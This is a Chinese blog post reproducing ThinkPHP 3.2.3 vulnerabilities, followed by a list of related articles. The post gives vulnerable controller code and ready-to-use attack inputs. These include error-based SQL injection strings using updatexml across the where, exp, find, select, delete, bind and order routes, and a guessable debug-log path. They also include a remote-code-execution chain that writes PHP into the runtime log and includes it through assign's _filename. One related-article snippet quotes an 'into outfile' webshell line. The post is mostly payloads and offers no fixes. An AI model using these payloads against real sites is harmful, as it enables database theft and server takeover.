[复现]Thinkphp3.2.3 漏洞

最新推荐文章于 2024-05-21 13:12:55 发布
最新推荐文章于 2024-05-21 13:12:55 发布
阅读量1.3w 收藏 8
点赞数
分类专栏: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuuhh/article/details/119323156
版权

前言

纸上得来终觉浅,绝知此事要躬行。

缓存函数

注意 S() F() 函数 可控时会造成危害。

日志泄露

ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。
THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log
THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log
6
需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。

SQL 注入

user表
user

一个小例子

代码如下

$id = I("get.id");
$data = M("user")->where("id=$id")->find();
dump($data);

变量虽然用I()函数获取,但是直接拼接变量,造成SQL注入。
id=1) and updatexml(1,concat(0x7e, user(), 0x7e),1)--
在这里插入图片描述

exp注入

$name = $_GET['name'];
$data = M("user")->where(array("name"=>$name))->find();
dump($data);

变量必须是原生函数获取,如果使用I函数无法注入,where方法内传入的必须是数组而且可控。
name[0]=exp&name[1]=='' and updatexml(1,concat(0x7e,user(),0x7e),1)--
在这里插入图片描述

find/select/delete注入

$id = I('id');
$res = M("user")->find($id);
//$res = M("user")->select($id);
//$res = M("user")->delete($id);
dump($res);

演示下find()方法注入。
2
小结:

find() select()方法注入

id[table]=user where 1 and updatexml(1,concat(0x7e,user(),0x7e),1)--
id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

delete()方法注入

id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1

update() 注入

$user['name'] = I("name");
$data['pass'] = I("pass");
$res = M("user")->where($user)->save($data);
dump($res);

user数组可控,变量用I函数获取,且使用save()方法。
name[0]=bind&name[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)--&pass=1
3

order注入

$name = I("name");
$order = I("order");
$res = M("user")->where(["name" => $name])->order($order)->find();
dump($res);

order()方法参数可控
order[updatexml(1,concat(0x3a,user()),1)]

5

RCE

业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。

$value = I("get.value");
$this->assign($value);
$this->display();

利用日志包含,先将payload写入日志内。

 /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?>

6
包含并执行日志内的代码

index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_08_02.log

在这里插入图片描述
不一定要包含日志,只要能上传并解析代码就行。

参考

https://xz.aliyun.com/t/2629#toc-1
https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

GTA6
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【安全漏洞ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1624
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
think+php+漏洞,ThinkPHP3.2.3漏洞分析
weixin_32824625的博客
03-28 1009
一、前言ThinkPHP漏洞分析文章有很多,这里我只是想对我学习的过程进行一个记录,有点菜,希望大佬不要喷我。二、where注入在控制器中,写个demo,利用字符串方式作为where传参时存在注入public functiongetuser(){$user = M('User')->where('id='.I('id'))->find();dump($user);}在变量user...
解决方案-thinkphp3.1漏洞-详细白客自学路线
最新发布
2401_84915584的博客
05-21 596
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
thinkPHP3.2.3sql注入漏洞
qq_50589021的博客
10-05 4318
前言 攻敌所必救: ThinkPHP中的常用方法汇总总结:M方法,D方法,U方法,I方法 Thinkphp3.2.3 安全开发须知 搭建: 首先第一步就是必须先放在www目录下(我是windows用的phpstudy)!!!! 创建数据库,表名一定与你接下来要M的名字的相对应 连接数据库的文件不多说了,自己配置:ThinkPHP/Conf/convention.php 配置控制器:\WWW\thinkphp3.2.3\Application\Home\Controller\Ind
ThinkPhp3.2.3缓存漏洞复现以及修复建议
飞鱼计划
04-18 9752
ThinkPhp3.2.3缓存漏洞复现以及修复建议 今天早上无意间看到thinkphp的缓存漏洞,小编在实际开发过程中用thinkphp3.2.3挺多的。 漏洞原文链接:https://xianzhi.aliyun.com/forum/read/1973.html有兴趣的小伙伴可以去详细的学习一下 我们这里来复现一下漏洞 后面我会提出修复建议 首先我们下载最新的thinkphp...
ThinkPHP 3.2.3 RCE漏洞
归零者的博客
11-25 1689
用蚁剑连接地址:index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log,密码为:8。访问index.php?ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控,可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,导致任意文件包含,可执行任意代码。,burp 抓包,将路径改为。日志文件中包含执行代码。
Thinkphp3.2.3 SQL注入漏洞
Sentiment的博客
05-20 4467
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 ThinkPHP/Conf/convention.php配置下数据库,我这里直接用的sqllabs的数据库 写个查询入口Application/Home/Controller/IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class IndexController ex
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 5560
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
tp3.2.3sql注入漏洞分析
qq_53856457的博客
05-18 1551
thinkphp3.2.3 sql注入漏洞分析 文章目录thinkphp3.2.3 sql注入漏洞分析thinkphp3.2.3 where注入环境配置数据库配置控制器payload:过程分析ThinkPHP3.2.3_bind注入1. 环境2. payload3. 过程分析thinkphp 3.2.3 exp注入1.环境2.payload:3. 过程分析**补充:**1.为什么I()方法能阻止sql注入?2.parseWhereItem方法设计缺陷3.漏洞代码中的where方法为什么要是数组的形式 先到t
免费thinkPHP3.2.3框架
07-20
《免费ThinkPHP3.2.3框架深度解析》 ThinkPHP3.2.3是一款深受开发者喜爱的开源PHP框架,以其简洁、高效的特性在Web开发领域占据了一席之地。本篇将深入探讨该框架的核心特点、主要功能以及如何进行实际应用。 一、...
ThinkPHP 3.2.3 核心版.zip
05-23
ThinkPHP 3.2.3 核心版 更新日志:2014-12-24 [数据库方面]数据库驱动完全用PDO重写;支持通用insertAll方法;改进参数绑定机制;主从分布式数据库连接改进;对Mongo的支持更加完善;[模型方面]模型类的诸多增强和...
thinkphp 3.2.3
03-25
《深入解析ThinkPHP 3.2.3框架》 ThinkPHP 3.2.3是一款基于MVC架构的PHP开发框架,由中国领先的开源社区——ThinkPHP团队开发并维护。这款框架以其简洁、高效的代码风格,丰富的功能特性以及良好的社区支持,在国内...
基于thinkphp3.2.3开发的电子商城(包含前后台)
06-17
《基于ThinkPHP3.2.3的电子商城系统详解》 在互联网技术日新月异的今天,电子商务已经成为商业活动的重要组成部分。而构建一个高效、稳定的电子商城系统,离不开强大的框架支持。本篇将深入探讨基于ThinkPHP3.2.3...
thinkphp3.2.3 分页代码分享
10-21
主要为大家介绍了thinkphp3.2.3 分页代码,非常实用的代码,感兴趣的小伙伴们可以参考一下
ThinkPHP3.2.3的SQL注入漏洞复现——考古?
Mrs_H的博客
11-11 1265
这里写目录标题关于ThinkPHP的SQL注入漏洞一.前言二.正文1.数据处理流程2.注入点一,数组注入3.注入点二,exp注入后记 关于ThinkPHP的SQL注入漏洞 一.前言 最近拖延症又犯难了,导致很久都没有时间来写这个文章。而且因为一些奇怪的缘故,导致自己的MySQL数据库中间崩了好几次,导致这次的漏洞复现磕磕绊绊的。同时这也是我自己第一次做代码审计,效率着实算不上高,就以此来记录一下自己这次的学习(考古)过程吧。 二.正文 1.数据处理流程 环境搭建方面,就用thinkphp官网上的历史遗留版本
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞笔记
程序员六七的博客
05-16 490
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
thinkphp3.2.3漏洞_命令执行漏洞
weixin_39724287的博客
11-21 720
No.1漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时,...
thinkphp3.2.3 rce漏洞复现
08-12
根据引用中提供的信息,ThinkPHP3.2.x存在一个RCE(远程代码执行)漏洞。根据引用中的描述,我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class.php`文件中的`Memcache`类的`destroy()`函数中可以找到这个函数。请注意,如果使用PHP7,在调用有参函数但没有传入参数的情况下会报错,因此应该使用PHP5而不是PHP7。具体的漏洞利用方法是,在URL中注入`?id=1*/ into outfile "path/1.php" LINES STARTING BY '<?php eval($_POST<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [wp 篇 DASCTF Thinkphp 3.2.3RCE复现](https://blog.csdn.net/weixin_46203060/article/details/119532553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【安全漏洞ThinkPHP 3.2.3 漏洞复现](https://blog.csdn.net/2201_75857869/article/details/129316463)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值